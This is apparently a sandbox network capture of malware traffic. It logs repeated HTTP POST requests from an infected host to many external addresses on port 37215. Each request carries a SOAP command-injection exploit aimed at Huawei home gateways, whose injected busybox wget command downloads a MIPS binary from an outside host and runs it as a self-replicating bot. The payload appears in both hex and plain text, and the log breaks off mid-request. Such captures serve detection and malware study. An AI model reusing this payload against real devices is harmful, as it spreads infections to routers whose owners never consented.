                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          676192.168.2.1559180197.13.144.4837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.620490074 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          677192.168.2.1544164194.189.115.237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.620559931 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          678192.168.2.154080641.65.181.21137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.620604038 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          679192.168.2.153937052.27.58.17337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.620631933 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          680192.168.2.1538154197.0.209.837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.620731115 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          681192.168.2.153524241.56.47.15837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.618048906 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          682192.168.2.1553268125.212.1.23137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.618068933 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          683192.168.2.1540134155.64.105.14637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.618093014 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          684192.168.2.154552441.51.18.16037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.618113995 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          685192.168.2.154290641.94.100.10837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.618140936 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
